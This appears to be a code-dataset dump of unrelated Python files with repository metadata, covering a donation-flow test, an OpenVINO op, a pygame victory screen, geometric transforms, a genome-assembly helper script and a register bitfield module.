url('donation-direct-prepare', tt_id=factory.donation_ticket_type_id_1), data=dict(custom_amount=123),
)
assert r.status == 200, await r.text()
action_id = (await r.json())['action_id']
assert 0 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
await factory.fire_stripe_webhook(action_id, amount=20_00, purpose='donate-direct')
assert 1 == await db_conn.fetchval('SELECT COUNT(*) FROM donations')
assert dummy_server.app['log'] == [
'POST stripe_root_url/customers',
'POST stripe_root_url/payment_intents',
'GET donorfy_api_root/standard/System/LookUpTypes/Campaigns',
f'GET donorfy_api_root/standard/constituents/ExternalKey/nosht_{factory.user_id}',
'GET donorfy_api_root/standard/constituents/123456',
'GET stripe_root_url/balance/history/txn_charge-id',
'POST donorfy_api_root/standard/transactions',
('email_send_endpoint', 'Subject: "Thanks for your donation", To: "Frank Spencer <[email protected]>"'),
]
| 41.75705 | 115 | 0.720883 | 0 | 0 | 357 | 0.018545 | 382 | 0.019844 | 18,832 | 0.978286 | 7,660 | 0.397922 |
9e930c5a58d02157e9d5c759c46110f181e09d5b | 85 | py | Python | lxman/cli/__main__.py | stuxcrystal/lxman | ea0b44a8b9424b3489e393591f5384a986f583a3 | ["MIT"] | 1 | 2017-12-04T18:48:21.000Z | 2017-12-04T18:48:21.000Z | lxman/cli/__main__.py | stuxcrystal/lxman | ea0b44a8b9424b3489e393591f5384a986f583a3 | ["MIT"] | null | null | null | lxman/cli/__main__.py | stuxcrystal/lxman | ea0b44a8b9424b3489e393591f5384a986f583a3 | ["MIT"] | null | null | null |
import colorama
from lxman.cli import cli
if __name__ == "__main__":
cli()
| 14.166667 | 27 | 0.658824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.117647 |
9e952388ffcae30ff69efaffb734ef8eaddfbd24 | 275 | py | Python | exercicios/ex047.py | mrcbnu/python-_exercicios | 773da52a227f0e9ecce998cb6b50b3fe167a4f1d | ["MIT"] | null | null | null | exercicios/ex047.py | mrcbnu/python-_exercicios | 773da52a227f0e9ecce998cb6b50b3fe167a4f1d | ["MIT"] | null | null | null | exercicios/ex047.py | mrcbnu/python-_exercicios | 773da52a227f0e9ecce998cb6b50b3fe167a4f1d | ["MIT"] | null | null | null |
###########################################
#             EXERCISE 047              #
###########################################
'''CREATE A PROGRAM THAT SHOWS ON SCREEN ALL THE EVEN
NUMBERS FROM 1 TO 50'''
for c in range(1, 51):
if c % 2 == 0:
        print(c, end=' ')
| 30.555556 | 55 | 0.341818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 206 | 0.749091 |
9e9894afbce14bcac12775c18c8be20d7bdde76f | 333 | py | Python | src/handler.py | HobbitOfIsengard/automata | 5f3bc2c9e42ac856e1bb4ef11dd28f42f5678c20 | ["MIT"] | null | null | null | src/handler.py | HobbitOfIsengard/automata | 5f3bc2c9e42ac856e1bb4ef11dd28f42f5678c20 | ["MIT"] | null | null | null | src/handler.py | HobbitOfIsengard/automata | 5f3bc2c9e42ac856e1bb4ef11dd28f42f5678c20 | ["MIT"] | null | null | null |
def handle(automata, result):
"""
This is a simple handler
:param automata: the automata which yielded the result
:type automata: :class:`Automata`
:param result: the result of the automata
:type result: bool
"""
print(result)
if not result:
automata.switch("ask m: try again: f: handle")
| 27.75 | 58 | 0.645646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 235 | 0.705706 |
9e98a6268aa07a08ba6a43715f82f5d441844cbc | 2,090 | py | Python | model-optimizer/extensions/ops/bucketize.py | evgenytalanin-intel/openvino | c3aa866a3318fe9fa8c7ebd3bd333b075bb1cc36 | ["Apache-2.0"] | null | null | null | model-optimizer/extensions/ops/bucketize.py | evgenytalanin-intel/openvino | c3aa866a3318fe9fa8c7ebd3bd333b075bb1cc36 | ["Apache-2.0"] | 1 | 2021-09-09T08:43:57.000Z | 2021-09-10T12:39:16.000Z | model-optimizer/extensions/ops/bucketize.py | evgenytalanin-intel/openvino | c3aa866a3318fe9fa8c7ebd3bd333b075bb1cc36 | ["Apache-2.0"] | null | null | null |
"""
Copyright (C) 2018-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import numpy as np
from mo.graph.graph import Node, Graph
from mo.ops.op import Op
class Bucketize(Op):
op = 'Bucketize'
def __init__(self, graph: Graph, attrs: dict):
mandatory_props = {
'kind': 'op',
'type': __class__.op,
'op': __class__.op,
'version': 'extension',
'type_infer': self.type_infer,
'infer': self.infer,
'in_ports_count': 2,
'out_ports_count': 1,
}
super().__init__(graph, mandatory_props, attrs)
def supported_attrs(self):
return ["with_right_bound"]
@staticmethod
def type_infer(node):
        # the output is always an integer since the layer outputs a bucket index
node.out_port(0).set_data_type(np.int32)
@staticmethod
def infer(node: Node):
assert node.with_right_bound is not None, \
"Attribute \"with_right_bound\" is not defined"
assert len(node.in_nodes()) == 2, \
"Incorrect number of inputs for {} node".format(node.id)
output_shape = node.in_port(0).data.get_shape()
node.out_port(0).data.set_shape(output_shape)
input_value = node.in_port(0).data.get_value()
buckets_value = node.in_port(1).data.get_value()
# compute if all input is constant
if input_value is not None and buckets_value is not None:
node.out_port(0).data.set_value(np.digitize(input_value, buckets_value, right=node.with_right_bound))
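            # Illustrative behaviour of the numpy call above (assumed inputs):
            # np.digitize([0.5, 3.2, 7.0], [1, 5], right=True) -> array([0, 1, 2]),
            # i.e. each input value maps to the index of its bucket.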
| 33.709677 | 113 | 0.661244 | 1,416 | 0.677512 | 0 | 0 | 878 | 0.420096 | 0 | 0 | 896 | 0.428708 |
9e9904613297e7bec0c0b0302bbc80565d246970 | 5,470 | py | Python | app/view/winners.py | pitust/OfMagesAndMagic | e5d5d4f0a930b01b047962028e5c633f6caefe40 | ["MIT"] | 15 | 2016-12-11T14:30:30.000Z | 2019-12-15T13:26:57.000Z | app/view/winners.py | pitust/OfMagesAndMagic | e5d5d4f0a930b01b047962028e5c633f6caefe40 | ["MIT"] | 10 | 2016-12-11T14:32:30.000Z | 2016-12-12T13:30:37.000Z | app/view/winners.py | pitust/OfMagesAndMagic | e5d5d4f0a930b01b047962028e5c633f6caefe40 | ["MIT"] | 4 | 2016-12-11T14:30:37.000Z | 2021-03-13T12:46:20.000Z |
import pygame
from app.view.animations import Delay, FadeIn, FadeOut, ChooseRandom, FrameAnimate, MovePosition, DelayCallBack, MoveValue, SequenceAnimation, ParallelAnimation, Timeout
from app.resources.event_handler import SET_GAME_STATE
from app.resources import text_renderer, colours
from app.resources.music import MusicManager
from app.resources.images import ImageManager
from app.conway.game_of_life import GameOfLife
from app.resources.event_handler import SOUND_EFFECT
class StateWinnersView:
def __init__(self, parent):
self.root = parent.parent
self.parent = parent
self.winners = self.root.winners
self.firework_size = 8
self.fireworks = GameOfLife(self.parent.resolution[0]//self.firework_size + 50,self.parent.resolution[1]//self.firework_size + 50)
self.root.event_handler.register_key_listener(self.handle_event)
self.congratulations_text = text_renderer.render_title("Champions", colours.COLOUR_WHITE)
self.team1_text = text_renderer.render_huge_text(self.winners[0].get_short_name(), colours.COLOUR_WHITE)
self.see_you = text_renderer.render_huge_text("Good Luck in the Finals!", colours.COLOUR_WHITE)
self.spawn_burst(self.fireworks.get_width()-65, 10)
self.spawn_burst(self.fireworks.get_width()-65, (self.fireworks.get_height()-65)//2-5)
self.spawn_burst(self.fireworks.get_width()-65, (self.fireworks.get_height()-65)//2+15)
self.spawn_burst(self.fireworks.get_width()-65, self.fireworks.get_height()-65)
self.spawn_burst(10, 10)
self.spawn_burst(10, (self.fireworks.get_height()-65)//2-5)
self.spawn_burst(10, (self.fireworks.get_height()-65)//2+15)
self.spawn_burst(10, self.fireworks.get_height()-65)
self.spawn_burst((self.fireworks.get_width()-65)//2 - 10, 10)
self.spawn_burst((self.fireworks.get_width()-65)//2 + 20, 10)
self.spawn_burst((self.fireworks.get_width()-65)//2 - 10, self.fireworks.get_height()-65)
self.spawn_burst((self.fireworks.get_width()-65)//2 + 20, self.fireworks.get_height()-65)
self.firework_animation = Timeout(self.update_fireworks, time=150)
self.animations = SequenceAnimation()
self.animations.add_animation(FadeIn(self.set_alpha, time=3000))
self.animations.add_animation(Delay( time=5000 ))
self.animations.add_animation(FadeOut(self.set_alpha, time=3000))
self.alpha = 0
self.frame = 0
def update_fireworks(self):
self.fireworks.update()
def set_alpha(self, alpha):
self.alpha = alpha
def spawn_burst(self, x, y):
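        # Seeds a small symmetric Game-of-Life pattern: two horizontal 3-cell
        # rows (at y and y+4) with a single live cell centred between them.
        # Under the standard rules this seed expands outward like a firework.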
self.fireworks.set_cell( x, y,1)
self.fireworks.set_cell(x+1, y,1)
self.fireworks.set_cell(x+2, y,1)
self.fireworks.set_cell(x+1, y+2,1)
self.fireworks.set_cell( x, y+4,1)
self.fireworks.set_cell(x+1,y+4,1)
self.fireworks.set_cell(x+2,y+4,1)
def render(self):
surface = pygame.Surface(self.parent.resolution)
for y in range(self.fireworks.get_height()):
for x in range(self.fireworks.get_width()):
node = self.fireworks.get_cell(x,y)
if node > 0:
pygame.draw.rect(surface, colours.COLOUR_YELLOW, (x*self.firework_size, y*self.firework_size, self.firework_size, self.firework_size))
surface.blit(self.congratulations_text,
((surface.get_width()-self.congratulations_text.get_width())/2,
surface.get_height()/2 - 150)
)
surface.blit(
self.team1_text,
((surface.get_width()-self.team1_text.get_width())/2,
(surface.get_height()-self.team1_text.get_height())/2)
)
mask = pygame.Surface(self.parent.resolution, pygame.SRCALPHA)
mask.fill((0,0,0, 255-self.alpha))
surface.blit(mask, (0,0))
return surface
def update(self, delta_t):
if self.animations.finished():
self.parent.trigger_exit_to_main()
self.animations.animate(delta_t)
self.firework_animation.animate(delta_t)
def handle_event(self, event):
if event.type == pygame.KEYDOWN:
if event.key in [pygame.K_ESCAPE]:
self.parent.trigger_exit_to_main()
def exit_state(self):
self.parent.parent.event_handler.unregister_key_listener(self.handle_event)
class AnnounceWinners:
def __init__(self, parent, state_seed='default'):
self.parent = parent
self.event_handler = parent.event_handler
self.resolution = self.parent.resolution
self.states = {
'default' : StateWinnersView
}
self.cur_state = state_seed
self.state = self.states[self.cur_state](self)
music_manager = MusicManager()
music_manager.restore_music_volume()
music_manager.play_song("champions", loops=-1)
def set_state(self, state):
self.state.exit_state()
self.state_code = state
self.state = self.states[state](self)
def render(self):
return self.state.render()
def update(self, delta_t):
self.state.update(delta_t)
def handle_event(self, event):
self.state.handle_event(event)
def trigger_exit_to_main(self):
self.state.exit_state()
event = pygame.event.Event(SET_GAME_STATE, state="main_menu", seed='intro')
pygame.event.post(event)
| 38.251748 | 169 | 0.668556 | 4,987 | 0.9117 | 0 | 0 | 0 | 0 | 0 | 0 | 84 | 0.015356 |
9e991333e11e3674737935eaa3ae326ec405ea15 | 7,259 | py | Python | Source Codes/Assignment1/transformations.py | amir-souri/ML-Exam2020 | 8feb614ce8171c2c8e88b0fa385db8b679b68748 | ["MIT"] | null | null | null | Source Codes/Assignment1/transformations.py | amir-souri/ML-Exam2020 | 8feb614ce8171c2c8e88b0fa385db8b679b68748 | ["MIT"] | null | null | null | Source Codes/Assignment1/transformations.py | amir-souri/ML-Exam2020 | 8feb614ce8171c2c8e88b0fa385db8b679b68748 | ["MIT"] | null | null | null |
import numpy as np
import math
import functools as fu
import cv2
import random as rand
def transform_points(m, points):
""" It transforms the given point/points using the given transformation matrix.
:param points: numpy array, list
The point/points to be transformed given the transformation matrix.
:param m: An 3x3 matrix
The transformation matrix which will be used for the transformation.
:return: The transformed point/points.
"""
ph = make_homogeneous(points).T
ph = m @ ph
return make_euclidean(ph.T)
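# For example (assuming a 1x2 point array and the translating() helper below):
#   transform_points(translating(5, 0), np.array([[1.0, 2.0]])) -> [[6.0, 2.0]]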
def transform_image(image, m):
""" It transforms the given image using the given transformation matrix.
    :param image: An image
        The image to be transformed given the transformation matrix.
    :param m: A 3x3 matrix
The transformation matrix which will be used for the transformation.
:return: The transformed image.
"""
row, col, _ = image.shape
return cv2.warpPerspective(image, m, (col, row))
def make_homogeneous(points):
""" It converts the given point/points in an euclidean coordinates into a homogeneous coordinate
:param points: numpy array, list
The point/points to be converted into a homogeneous coordinate.
:return: The converted point/points in the homogeneous coordinates.
"""
if isinstance(points, list):
points = np.asarray([points], dtype=np.float64)
return np.hstack((points, np.ones((points.shape[0], 1), dtype=points.dtype)))
else:
return np.hstack((points, np.ones((points.shape[0], 1), dtype=points.dtype)))
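# For example, make_homogeneous(np.array([[3, 4]])) yields [[3, 4, 1]]: each
# point gains a trailing homogeneous coordinate of 1.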
def make_euclidean(points):
"""It converts the given point/points in a homogeneous coordinate into an euclidean coordinates.
:param points: numpy array, list
The point/points to be converted into an euclidean coordinates.
:return: The converted point/points in the euclidean coordinates.
"""
return points[:, :-1]
def identity():
""" It provides an identity transformation matrix.
:return: An identity matrix (3 x 3) using homogeneous coordinates.
"""
return np.array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]],
dtype=np.float64)
def rotating(θ=0):
""" It provides a rotation matrix given θ degrees which can then be used to rotate 2D point/points or an image
clockwise about the origin. If you want to rotate counterclockwise pass a negative degree.
:param θ: int
        The amount of degrees to rotate by. The default value is 0, which leaves
        the point/points or the image unrotated.
:returns: The rotation matrix (3 x 3) using homogeneous coordinates.
"""
θ = np.radians(θ)
cos = math.cos(θ)
sin = math.sin(θ)
return np.array([[cos, sin, 0],
[-sin, cos, 0],
[0, 0, 1]],
dtype=np.float64)
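# For example, rotating(90) maps the point (1, 0) to (0, -1), i.e. a quarter
# turn clockwise about the origin.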
def translating(t_x=0, t_y=0):
""" It provides a translate matrix given quantity t_x and t_y for shifting x and y axes respectively.It can then
be used to translate or ”shift” a 2D point/points or an image.
as well as the y-axis by t_y.
:param t_x: int
The amount of shifting in the direction of the x-axis
:param t_y: int
The amount of shifting in the direction of the y-axis
The default values for both are 0. That is it does not translate the point/points or the image when applied.
:returns: The translation matrix (3 x 3) in homogeneous coordinates.
"""
return np.array([[1, 0, t_x],
[0, 1, t_y],
[0, 0, 1]],
dtype=np.float64)
def scaling(scale_x=1, scale_y=1):
""" It provides a scale matrix given quantity scale_x and scale_y for scaling x and y axes respectively.It can then
be used to scale a 2D point/points or an image.
scales (enlarge or shrink) the given 2D point/points in the direction of the x-axis by scale_x
as well as the y-axis by scale_x.
:param scale_x: int
The scale factor by which we wish to enlarge/shrink the point/points in the direction of the x-axis.
:param scale_y: int
The scale factor by which we wish to enlarge/shrink the point/points in the direction of the y-axis.
The default values for both are 1. That is it does not scale the point/points or the image when applied.
:return: The scaling matrix (3 x 3) in homogeneous coordinates.
"""
return np.array([[scale_x, 0, 0],
[0, scale_y, 0],
[0, 0, 1]],
dtype=np.float64)
def arbitrary():
"""
    :return: A (3 x 3) arbitrary transformation matrix built by applying the translating, scaling and rotating functions with random parameters.
"""
θ = rand.randint(-360, 361)
r = rotating(θ)
sx, sy = rand.sample(range(-10, 11), 2)
s = scaling(sx, sy)
tx, ty = rand.sample(range(-400, 401), 2)
t = translating(tx, ty)
I = identity()
if 0 <= tx <= 200:
return s @ t @ r @ I
else:
return r @ s @ I @ t
def invert(m):
""" It provides a matrix for performing the inversion.
:param m: a (3 x 3) matrix.
:return: The inverse of the given matrix.
"""
d = np.linalg.det(m)
if d != 0:
return np.linalg.inv(m).astype(dtype=np.float64)
else:
raise Exception("It is a non-invertible matrix")
def combine(*transformations):
""" It combines the given transformation matrices.
    Be aware of the order in which you pass the transformation matrices, since the combined matrix applies them in that order.
:param transformations: (3 x 3) transformation matrices. As many as you want.
The matrices to be combined.
:return: The combined matrix (3 x 3).
"""
transformations = reversed(transformations)
return fu.reduce(lambda tr1, tr2: tr1 @ tr2, transformations)
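# For example, combine(translating(5, 0), rotating(90)) builds rotating(90) @
# translating(5, 0), so applying it to points translates first, then rotates.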
def learn_affine(srs, tar):
""" It finds the affine transformation matrix between the two given triangles (3 points).
A x = b => x = inv(A) b
    :param srs: three 2D points (one row per point) representing a triangle.
        The source points.
    :param tar: three 2D points (one row per point) representing a triangle.
        The target points.
:return: The affine transformation matrix.
"""
x1, x2, x3 = srs[0, 0], srs[1, 0], srs[2, 0]
y1, y2, y3 = srs[0, 1], srs[1, 1], srs[2, 1]
b = tar.flatten()
a = np.array([[x1, y1, 1, 0, 0, 0],
[0, 0, 0, x1, y1, 1],
[x2, y2, 1, 0, 0, 0],
[0, 0, 0, x2, y2, 1],
[x3, y3, 1, 0, 0, 0],
[0, 0, 0, x3, y3, 1]],
dtype=np.float64)
d = np.linalg.det(a)
if d != 0:
ai = np.linalg.inv(a)
x = ai @ b
x = x.flatten()
a1, a2, a3, a4 = x[0], x[1], x[3], x[4]
tx, ty = x[2], x[5]
aff_transformation = np.array([[a1, a2, tx],
[a3, a4, ty],
[0, 0, 1]],
dtype=np.float64)
return aff_transformation
else:
raise Exception("It is a non-invertible matrix") | 38.005236 | 121 | 0.609726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,267 | 0.586771 |
9e996e95c8e4d35efb2b156fddfb2e6b4af528f7 | 665 | py | Python | scripts/identify_circular-from-reassembled-flye.py | SeanChenHCY/metaLAS | 854db6a966a11ab628ad33fa3264a74cfc54eef9 | ["MIT"] | 1 | 2021-10-04T07:45:18.000Z | 2021-10-04T07:45:18.000Z | scripts/identify_circular-from-reassembled-flye.py | SeanChenHCY/metaLAS | 854db6a966a11ab628ad33fa3264a74cfc54eef9 | ["MIT"] | 1 | 2021-08-30T08:01:35.000Z | 2021-09-02T09:49:01.000Z | scripts/identify_circular-from-reassembled-flye.py | SeanChenHCY/metaLAS | 854db6a966a11ab628ad33fa3264a74cfc54eef9 | ["MIT"] | null | null | null |
# sys.argv[1] = bin_name, sys.argv[2] = bin_dir, sys.argv[3] = output_dir
import os, sys
bin_name=sys.argv[1]
bin_dir = sys.argv[2]
output_dir = sys.argv[3]
large_circular = []
flye_info = open(bin_dir + '/assembly_info.txt','r')
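# Flye's assembly_info.txt is tab-separated with columns: seq_name, length,
# coverage, circular (Y/N), repeat, multiplicity, alt_group, graph_path; so
# entry[1] below is the contig length and entry[3] flags circular contigs.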
read_info = True
while read_info:
read_info = flye_info.readline()
entry = read_info.split('\t')
if len(entry) > 3:
if (entry[3] == "Y") and (int(entry[1]) > 2000000):
large_circular.append(entry[0])
for i in large_circular:
os.system('seqkit grep -n -p '+ i + ' ' + bin_dir + '/assembly.fasta -o ' +output_dir + '/' + bin_name + '_'+ i + '_unpolished_rf.fasta' )
| 25.576923 | 142 | 0.628571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 202 | 0.303759 |
9e99d0c79aa914a0737c4a26e98e840b98a19a4a | 322 | py | Python | apps/Utils/message_constants.py | vikkyB2/UserMaintenance | 0ae9db17d694ae67ac82145524cae4a1f69d54c6 | ["MIT"] | null | null | null | apps/Utils/message_constants.py | vikkyB2/UserMaintenance | 0ae9db17d694ae67ac82145524cae4a1f69d54c6 | ["MIT"] | null | null | null | apps/Utils/message_constants.py | vikkyB2/UserMaintenance | 0ae9db17d694ae67ac82145524cae4a1f69d54c6 | ["MIT"] | null | null | null |
LOGGEDOUT_SCSS_MSG = "User Logged out successfully"
LOGIN_SCSS_MSG = "User Logged in successfully"
INVALID_PASS = "Passowrd not valid"
INVALID_USER = "User dose not exsists"
INVALID_SESSION = "Session Invalid"
INVALID_REQUEST = "Not a valid request"
BAD_REQUEST = "Bad request"
PASSWORD_EXPIERD = "Password Expierd" | 40.25 | 52 | 0.779503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 171 | 0.531056 |
9e9c6e139be0c60a12be6bd43fc6f12d8b899a15 | 1,611 | py | Python | intg/src/main/python/apache_atlas/model/lineage.py | alexwang789/atlas | b265f5e80e02d69ea7bbcfd9d0770361ca7fa185 | ["Apache-2.0"] | 4 | 2020-10-30T06:15:23.000Z | 2022-02-18T09:56:27.000Z | intg/src/main/python/apache_atlas/model/lineage.py | alexwang789/atlas | b265f5e80e02d69ea7bbcfd9d0770361ca7fa185 | ["Apache-2.0"] | null | null | null | intg/src/main/python/apache_atlas/model/lineage.py | alexwang789/atlas | b265f5e80e02d69ea7bbcfd9d0770361ca7fa185 | ["Apache-2.0"] | 4 | 2020-10-30T07:21:57.000Z | 2021-10-21T16:07:02.000Z |
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import enum
class AtlasLineageInfo:
lineageDirection_enum = enum.Enum('lineageDirection_enum', 'INPUT OUTPUT BOTH', module=__name__)
def __init__(self, baseEntityGuid=None, lineageDirection=None, lineageDepth=None, guidEntityMap=None, relations=None):
self.baseEntityGuid = baseEntityGuid
self.lineageDirection = lineageDirection
self.lineageDepth = lineageDepth
self.guidEntityMap = guidEntityMap if guidEntityMap is not None else {}
self.relations = relations if relations is not None else set()
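# Example (illustrative): a lineage query result covering both directions,
#   info = AtlasLineageInfo(baseEntityGuid='<guid>',
#                           lineageDirection=AtlasLineageInfo.lineageDirection_enum.BOTH,
#                           lineageDepth=3)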
class LineageRelation:
def __init__(self, fromEntityId=None, toEntityId=None, relationshipId=None):
self.fromEntityId = fromEntityId
self.toEntityId = toEntityId
        self.relationshipId = relationshipId
| 41.307692 | 122 | 0.7455 | 783 | 0.486034 | 0 | 0 | 0 | 0 | 0 | 0 | 834 | 0.517691 |
9e9ef4bfbf0ebd4b0914ac2783452487117ef345 | 7,247 | py | Python | ucdev/register.py | vpetrigo/python-ucdev | d3606fd1244dfefef039c7c38acb8b4a1f086c29 | ["MIT"] | 11 | 2015-07-08T01:28:01.000Z | 2022-01-26T14:29:47.000Z | ucdev/register.py | vpetrigo/python-ucdev | d3606fd1244dfefef039c7c38acb8b4a1f086c29 | ["MIT"] | 5 | 2017-12-07T15:04:00.000Z | 2021-06-02T14:47:14.000Z | ucdev/register.py | vpetrigo/python-ucdev | d3606fd1244dfefef039c7c38acb8b4a1f086c29 | ["MIT"] | 4 | 2017-02-18T18:20:13.000Z | 2022-03-23T16:21:20.000Z |
#!/usr/bin/env python
# -*- coding: utf-8-unix -*-
"""
FOO = Register("A:4 B:4", 0x12)
BAR = Register("B:4 C:4", 0x23)
# evals as int which is a register address
print(FOO == 0x12)
# each field attribute returns a mask for that field
print(FOO.B == 0b00001111)
print(BAR.B == 0b11110000)
# ERROR: Register definition is readonly
FOO.B = 0b10101010
# creates register instance with initial value
foo = FOO(0xAC)
print(foo.A == 0xA)
print(foo.B == 0xC)
print(foo == 0xAC)
foo.B = 0
print(foo == 0xA0)
"""
import sys, os
from bitstring import Bits, BitArray
"""
Convert various typed values into BitArray value.
"""
def to_bits(val, bitlen):
if isinstance(val, str) or isinstance(val, bytearray):
return Bits(bytes=val, length=bitlen)
elif isinstance(val, Bits):
return Bits(bytes=val.bytes, length=bitlen)
elif isinstance(val, RegisterValue):
return Bits(bytes=val.value.bytes, length=bitlen)
return Bits(uint=val, length=bitlen)
"""
Installs a filter function to limit access to non-existing attributes.
NOTE:
This replaces the class of the passed object with a dynamically
generated subclass of the original class.
"""
def protect_object(obj):
sub = type("Protected" + type(obj).__name__, (type(obj),), {})
fset = sub.__setattr__
def fset_wrap(self, key, val):
if not hasattr(self, key):
raise AttributeError("Access denied for key: %s" % key)
return fset(self, key, val)
sub.__setattr__ = fset_wrap
obj.__class__ = sub
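def _example_protect_object():
    # Hypothetical demo (not part of the original module): after calling
    # protect_object(), assigning an attribute that does not already exist
    # raises AttributeError instead of silently creating it.
    class Point(object):
        def __init__(self):
            self.x = 0
    p = Point()
    protect_object(p)
    p.x = 1      # fine: 'x' already exists on the instance
    try:
        p.y = 2  # rejected by the generated subclass
    except AttributeError:
        pass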
"""
Generic class to wrap built-in types with custom attributes.
"""
class Value(object):
def __new__(cls, arg, **kw):
return type(cls.__name__, (type(arg), cls, ), kw)(arg)
class Field(Bits):
# NOTE:
    # Subclassing bitstring.* is a pain, so I'll just work around it
# by a factory method.
@classmethod
def create(cls, value, masklen, bitlen, offset):
field = Bits.__new__(cls, uint=value, length=masklen)
field.__offset = offset
field.__bitlen = bitlen
return field
@property
def offset(self):
return self.__offset
@property
def bitlen(self):
return self.__bitlen
class Register(int):
def __new__(cls, desc, address):
r_fields = []
r_bitlen = 0
# parse register description
for f in desc.split():
# expected: f in (":", "HOGE", "HOGE:123", ":123")
pair = f.split(":")
if len(pair) == 2:
f_name, f_bitlen = pair[0], int(pair[1]) if pair[1] else 1
else:
f_name, f_bitlen = pair[0], 1
r_fields.append((f_name, f_bitlen))
r_bitlen += f_bitlen
# returns bitmask implemented as readonly property
def makeprop(r_bitlen, f_bitlen, f_offset):
value = ((1 << f_bitlen) - 1) << f_offset
field = Field.create(value, r_bitlen, f_bitlen, f_offset)
return property(lambda x:field)
# generate property from register description
r_fields.reverse()
kw = {}
f_offset = 0
for f_name, f_bitlen in r_fields:
if len(f_name) > 0:
kw[f_name] = makeprop(r_bitlen, f_bitlen, f_offset)
f_offset += f_bitlen
r_fields.reverse()
# dynamically generate class for this register configuration
sub = type(cls.__name__, (cls, ), kw)
sub.__fields = [k for k,v in r_fields if k]
sub.__length = r_bitlen
obj = int.__new__(sub, address)
protect_object(obj)
return obj
@property
def fields(self):
return list(self.__fields)
@property
def length(self):
return self.__length
"""
Returns a new register instance with given initial value.
"""
def __call__(self, *args, **kwargs):
reg = RegisterValue(self, 0)
if args:
reg.value = args[0]
for k, v in kwargs.items():
setattr(reg, k, v)
return reg
class RegisterValue(object):
def __new__(cls, reg, value):
if cls is not RegisterValue:
return object.__new__(cls)
def makeprop(field):
def fget(self):
fval = (self.__value & field) >> field.offset
return Bits(uint=fval.uint, length=field.bitlen)
def fset(self, val):
curval = self.__value
newval = to_bits(val, curval.length) << field.offset
curval ^= field & curval
self.__value = curval | newval
self.__notify()
return property(fget, fset)
kw = {}
for f_name in reg.fields:
field = getattr(reg, f_name)
kw[f_name] = makeprop(field)
obj = type(cls.__name__, (cls, ), kw)(reg, value)
obj.__reg = reg
obj.__mon = {}
obj.value = value
protect_object(obj)
return obj
@property
def length(self):
return self.__reg.length
@property
def value(self):
return BitArray(bytes=self.__value.tobytes())
@value.setter
def value(self, value):
self.__value = to_bits(value, self.__reg.length)
self.__notify()
@property
def fields(self):
return self.__reg.fields
def subscribe(self, func):
self.__mon[func] = 1
def unsubscribe(self, func):
        if func in self.__mon:
del self.__mon[func]
def __notify(self, *args, **kwargs):
for func in self.__mon.keys():
func(self, *args, **kwargs)
def __repr__(self):
rep = []
for f_name in self.fields:
field = getattr(self, f_name)
rep.append("{0}={1}".format(f_name, field))
return "(" + ", ".join(rep) + ")"
"""
Returns a new register value instance with the same initial value.
"""
def __call__(self, *args, **kwargs):
reg = RegisterValue(self.__reg, args[0] if args else self.value)
for k, v in kwargs.items():
setattr(reg, k, v)
return reg
def __and__(self, v):
return self.value & to_bits(v, self.length)
def __or__(self, v):
return self.value | to_bits(v, self.length)
def __xor__(self, v):
return self.value ^ to_bits(v, self.length)
def __nonzero__(self):
return self.value.uint
if __name__ == "__main__":
from IPython import embed
def handle_exception(atype, value, tb):
if hasattr(sys, 'ps1') or not sys.stderr.isatty():
# we are in interactive mode or we don't have a tty-like
# device, so we call the default hook
sys.__excepthook__(atype, value, tb)
else:
# we are NOT in interactive mode, print the exception...
import traceback
traceback.print_exception(atype, value, tb)
print
# ...then start the debugger in post-mortem mode.
from IPython import embed
embed()
sys.excepthook = handle_exception
REG = Register("FOO:3 :1 BAR:4", 0x12)
print(REG)
print(REG.FOO)
print(REG.BAR)
reg = REG(0xAC)
print(reg)
print(reg.FOO)
print(reg.BAR)
embed()
| 27.660305 | 74 | 0.588519 | 4,805 | 0.663033 | 0 | 0 | 792 | 0.109287 | 0 | 0 | 1,576 | 0.217469 |
9e9f1ba89714829bd8385e0bc2781953760fa2f6 | 83,916 | py | Python | pynsxv/library/nsx_dfw.py | preussal/pynsxv | 20d50236243729c0f52864825b23861ea1b664d3 | [
"MIT",
"Ruby",
"X11",
"Unlicense"
]
| 2 | 2020-10-20T16:09:25.000Z | 2020-12-16T23:35:55.000Z | pynsxv/library/nsx_dfw.py | preussal/pynsxv | 20d50236243729c0f52864825b23861ea1b664d3 | [
"MIT",
"Ruby",
"X11",
"Unlicense"
]
| null | null | null | pynsxv/library/nsx_dfw.py | preussal/pynsxv | 20d50236243729c0f52864825b23861ea1b664d3 | [
"MIT",
"Ruby",
"X11",
"Unlicense"
]
| 2 | 2020-12-16T23:35:56.000Z | 2021-02-04T07:00:08.000Z | #!/usr/bin/env python
# coding=utf-8
#
# Copyright © 2015-2016 VMware, Inc. All Rights Reserved.
#
# Licensed under the X11 (MIT) (the “License”) set forth below;
#
# you may not use this file except in compliance with the License. Unless required by applicable law or agreed to in
# writing, software distributed under the License is distributed on an “AS IS” BASIS, without warranties or conditions
# of any kind, EITHER EXPRESS OR IMPLIED. See the License for the specific language governing permissions and
# limitations under the License. Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
